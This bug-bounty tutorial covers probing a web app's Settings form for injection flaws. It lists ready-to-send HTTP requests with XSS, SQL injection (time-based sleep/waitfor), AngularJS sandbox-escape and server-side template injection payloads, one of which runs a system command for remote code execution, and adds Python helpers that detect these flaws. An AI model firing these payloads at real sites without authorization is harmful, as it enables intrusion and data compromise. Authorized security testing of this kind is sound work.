Bug Bounty Hunter Series: How to Test the Settings Feature
Disclaimer: the programs and methods discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and related liability; the author accepts none.
Article
This series covers how to test the Settings feature. Every vendor's Settings page differs a little, but the overall shape is the same, so the checks below carry over. Let's begin (honestly, I almost didn't publish this; some of it is a bit too cheeky, haha).
Method 1
Try injecting Null, an empty value, or %00 into the email, username, password or phone field. These are three different inputs: the literal string "null", a zero-length value, and an actual NUL byte (%00 decodes to 0x00), and each can trip different code paths. Then compare the response with a normal save: a changed status code, a leaked stack trace, a much longer or shorter page, or a setting that ends up half-updated all count as "something odd happened".
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
email=null&token=CSRF
(repeat with user, pass and phone as the field, and with an empty value and %00 in place of null; token is the valid anti-CSRF token)
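The following is an added example, not code from the original post: it builds the Method 1 variants with the correct form encoding (urlencode turns a real NUL byte into %00, whereas typing "%00" into a browser form would be sent double-encoded as %2500) and then flags the response differences a tester would look for. The field name, the token value and the sample responses are constructed for the demo.

```python
import re
from urllib.parse import urlencode

# Added example (not from the original post). Field/token names are placeholders.

def build_null_variants(field: str, csrf_token: str = "CSRF"):
    """Return (label, form_body) pairs covering the distinct meanings of "null"."""
    variants = [
        ("string-null", "null"),        # the literal word
        ("empty", ""),                  # zero-length value
        ("nul-byte", "\x00"),           # urlencode() emits this as %00
        ("nul-byte-embedded", "admin\x00"),  # truncation bugs show up here
    ]
    bodies = [(label, urlencode({field: value, "token": csrf_token}))
              for label, value in variants]
    # Leaving the parameter out entirely is a fifth case urlencode cannot express.
    bodies.append(("missing", urlencode({"token": csrf_token})))
    return bodies


# Strings that should never appear in a production Settings response.
ERROR_MARKERS = re.compile(
    r"(Traceback|Exception|SQL syntax|NullPointerException|stack trace)", re.I)


def diff_response(baseline: dict, candidate: dict, length_tolerance: int = 50):
    """Compare a variant's response with the normal-save baseline.

    Both dicts are {"status": int, "body": str}. Returns a list of human-readable
    anomalies; an empty list means the variant behaved like a normal save."""
    findings = []
    if candidate["status"] != baseline["status"]:
        findings.append(f"status {baseline['status']} -> {candidate['status']}")
    leak = ERROR_MARKERS.search(candidate["body"])
    if leak and not ERROR_MARKERS.search(baseline["body"]):
        findings.append("error text leaked: " + leak.group(0))
    delta = len(candidate["body"]) - len(baseline["body"])
    if abs(delta) > length_tolerance:
        findings.append(f"body length {len(baseline['body'])} -> {len(candidate['body'])}")
    return findings


# Constructed responses standing in for a real target.
BASELINE = {"status": 200, "body": "<p>Saved</p>"}
SAMPLE_RESPONSES = {
    "string-null": {"status": 200, "body": "<p>Saved</p>"},
    "empty": {"status": 400, "body": "<p>Email is required</p>"},
    "nul-byte": {"status": 500,
                 "body": "java.lang.NullPointerException at Settings.save"},
    "nul-byte-embedded": {"status": 200, "body": "<p>Saved</p>"},
    "missing": {"status": 200, "body": "<p>Saved</p>"},
}


def run_demo(field: str = "email"):
    """Return {label: findings} for every variant, using the constructed responses."""
    return {label: diff_response(BASELINE, SAMPLE_RESPONSES[label])
            for label, _body in build_null_variants(field)}


if __name__ == "__main__":
    for label, body in build_null_variants("email"):
        print(f"{label:20} {body}")
    for label, findings in run_demo().items():
        print(f"{label:20} {findings or 'no change'}")
```

Against a live target, replace SAMPLE_RESPONSES with the result of posting each body (for example with requests.post, sending the session cookie and the real token) and feed status code and text into diff_response. The "nul-byte-embedded" case is worth keeping: a value that saves as "admin" after the NUL is silently truncated is a different bug from one that throws.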
Method 2
Try injecting '"><svg/onload=prompt('XSS');>{{7*7}}
into the username. This single polyglot probes for SQLi, XSS, SSTI and CSTI at once: the quotes may break a SQL string, the svg tag fires if the value is reflected without HTML encoding, and {{7*7}} turning into 49 means a template engine (server-side or an AngularJS-style client-side one) evaluated it.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
user='"><svg/onload=prompt('XSS');>{{7*7}}&token=CSRF
(also try the name field)
Method 3
Try injecting SSTI payloads into the username: {{7*7}}, {{'7'*7}}
or {{this}}.
If the value comes back evaluated (49, or 7777777 for the string-repetition variant) instead of as the literal text, an RCE may be waiting for you.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user={{7*7}}&token=CSRF
(also try the name field)
Method 4
Try injecting the following SSTI payload into the username (for Java-based template engines that expose java.lang.Object methods to the template; URL-encode it in the form body):
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
If netstat output appears in the response, you have RCE.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
user={{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"netstat\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}&token=CSRF
Method 5
Try injecting the following CSTI payload (an AngularJS 1.x sandbox escape) into the username:
{{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}
If the page renders the stored value inside an Angular-compiled template, this yields an XSS.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user={{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}&token=CSRF
(also try the name field)
Method 6
Try injecting time-based SQLi payloads into the username, for example ' or sleep(20)' or -IF(1=1,SLEEP(20),0) AND id='1 (MySQL), or ' waitfor delay '0:0:30'-- (MSSQL).
A high-severity finding may be waiting for you. Always compare against a baseline request and confirm that a longer delay produces a proportionally longer response, so a merely slow server is not mistaken for an injection.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user=' or sleep(20)'&token=CSRF
(also try the name field)
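Below is an added example, not code from the original post, of how to turn Method 6 into a repeatable check. It measures a baseline, then each of the three payload shapes the post lists at two different delays, and only reports a hit when the delay is both reproduced and scales with the requested value. The send() callable is the only target-specific piece; the two fake backends and the 10 ms "second" used for the stand-alone run are constructed for the demo.

```python
import re
import statistics
import time

# Added example (not from the original post).
# Time-based templates from the post; {d} is the requested delay in seconds.
PAYLOADS = {
    "mysql-or-sleep": "' or sleep({d})'",
    "mysql-if-sleep": "-IF(1=1,SLEEP({d}),0) AND id='1",
    "mssql-waitfor": "' waitfor delay '0:0:{d}'--",
}


def _median_seconds(send, value, samples):
    """Median wall-clock time of `samples` requests; the median resists one slow outlier."""
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        send(value)
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def detect_time_based_sqli(send, delay=5, samples=3, seconds_per_unit=1.0):
    """Return {payload_name: bool}.

    `send(value)` must submit the Settings form with the username set to `value`
    and block until the response arrives. A payload is confirmed only when the
    injected delay is reproduced AND doubling it roughly doubles the extra wait;
    that rules out a server that is simply slow, or slow on any stray quote."""
    baseline = _median_seconds(send, "tester", samples)
    expected = delay * seconds_per_unit
    verdicts = {}
    for name, template in PAYLOADS.items():
        extra1 = _median_seconds(send, template.format(d=delay), samples) - baseline
        extra2 = _median_seconds(send, template.format(d=delay * 2), samples) - baseline
        verdicts[name] = extra1 >= 0.8 * expected and extra2 >= 1.6 * expected
    return verdicts


# Constructed stand-ins for a real target (real use: wrap requests.post in `send`).
SIM_SECONDS_PER_UNIT = 0.01  # one "second" of injected delay = 10 ms, keeps the demo fast


def fake_vulnerable_backend(value):
    """Acts like `... WHERE name='<value>'` run unparameterised on MySQL/MSSQL."""
    m = re.search(r"sleep\((\d+)\)|delay '0:0:(\d+)'", value, re.I)
    if m:
        time.sleep(int(m.group(1) or m.group(2)) * SIM_SECONDS_PER_UNIT)
    return 200, "<p>Saved</p>"


def fake_slow_but_safe_backend(value):
    """Parameterised query on a slow server: constant latency whatever the input."""
    time.sleep(3 * SIM_SECONDS_PER_UNIT)
    return 200, "<p>Saved</p>"


if __name__ == "__main__":
    print("vulnerable:", detect_time_based_sqli(
        fake_vulnerable_backend, seconds_per_unit=SIM_SECONDS_PER_UNIT))
    print("slow but safe:", detect_time_based_sqli(
        fake_slow_but_safe_backend, seconds_per_unit=SIM_SECONDS_PER_UNIT))
```

For a live target, send would be something like lambda v: requests.post(url, data={"user": v, "token": token}, cookies=session_cookies, timeout=delay * 3), and seconds_per_unit stays at 1.0. Keep delay modest (5 seconds is plenty) because every sample blocks a server worker for that long.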
Method 7
Try injecting a plain XSS payload into the username:
<svg/onload=alert('XSS')> or <script>alert(document.domain);</script>
Check every place the name is displayed (profile page, navigation bar, e-mails, admin views), not just the Settings form, since a stored value is often reflected without encoding somewhere else.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user=<svg/onload=alert('XSS')>&token=CSRF
(also try the name field)
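The classifier below is an added example (not from the original post) that serves Methods 2, 3, 5 and 7 together: given the value you submitted and the page that later displays it, it decides whether the value came back HTML-encoded, raw (XSS), evaluated server-side (SSTI, distinguishing the Jinja2-style and Twig-style answers to {{'7'*7}}), or verbatim into a page that bootstraps AngularJS (a CSTI candidate to confirm in a browser). All responses are constructed for the demo.

```python
import html
import re

# Added example (not from the original post).
POLYGLOT = "'\"><svg/onload=prompt('XSS');>{{7*7}}"  # the Method 2 payload


def classify_reflection(sent: str, body: str) -> dict:
    """Decide what the Settings page did with a reflected username/name value."""
    escaped = html.escape(sent, quote=True)
    result = {
        "reflected_raw": sent in body,         # came back byte-for-byte
        "reflected_escaped": escaped in body,  # came back HTML-encoded (the safe case)
        "xss": False,
        "ssti": None,
        "csti_candidate": False,
    }
    # XSS: the tag from the payload survived unencoded, even if the rest changed.
    tag = re.search(r"<(svg|script)[^>]*>", sent, re.I)
    if tag and tag.group(0) in body:
        result["xss"] = True
    # SSTI: the template expression is gone and its computed value is present.
    # Re-test with a different pair of numbers before reporting; "49" can collide
    # with unrelated page content.
    if "{{7*7}}" in sent and "{{7*7}}" not in body and "49" in body:
        result["ssti"] = "evaluated {{7*7}} -> 49"
    if "{{'7'*7}}" in sent and "{{'7'*7}}" not in body:
        if "7777777" in body:
            result["ssti"] = "Jinja2-style ('7'*7 is string repetition)"
        elif "49" in body:
            result["ssti"] = "Twig-style ('7'*7 is coerced to a number)"
    # CSTI: the braces come back verbatim into a page that loads AngularJS, so the
    # browser, not the server, will evaluate them. Confirm manually in a browser.
    if "{{" in sent and result["reflected_raw"] and re.search(
            r"\bng-app\b|angular(\.min)?\.js", body, re.I):
        result["csti_candidate"] = True
    return result


# Constructed responses standing in for the page that displays the saved name.
RESPONSE_RAW = '<input name="user" value="' + POLYGLOT + '">'
RESPONSE_ESCAPED = '<input name="user" value="' + html.escape(POLYGLOT, quote=True) + '">'
RESPONSE_SSTI = "<h1>Hello " + POLYGLOT.replace("{{7*7}}", "49") + "</h1>"
RESPONSE_ANGULAR = ('<html ng-app><body><input name="user" value="'
                    + html.escape(POLYGLOT, quote=False) + '"></body></html>')


def run_demo():
    """Classify each constructed response; returned so callers can inspect it."""
    return {
        "raw": classify_reflection(POLYGLOT, RESPONSE_RAW),
        "escaped": classify_reflection(POLYGLOT, RESPONSE_ESCAPED),
        "ssti": classify_reflection(POLYGLOT, RESPONSE_SSTI),
        "jinja2": classify_reflection("{{'7'*7}}", "<h1>Hello 7777777</h1>"),
        "twig": classify_reflection("{{'7'*7}}", "<h1>Hello 49</h1>"),
        "angular": classify_reflection("{{7*7}}",
                                       '<html ng-app><body>Hello {{7*7}}</body></html>'),
    }


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:8} {verdict}")
```

The escaped case is what a correct implementation looks like: the value is present but only in its HTML-encoded form, so none of the other flags fire. In RESPONSE_SSTI both xss and ssti are set, which is realistic: a server that evaluates the template usually also emits the svg tag unencoded.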
References
https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty
https://verneet.com/fuzzing-77-till-p1/
https://hackerone.com/reports/125980
https://gauravnarwani.com/injecting-6200-to-1200/
https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
https://hackerone.com/reports/587829
https://hackerone.com/reports/150156
https://whitton.io/articles/uber-turning-self-xss-into-good-xss/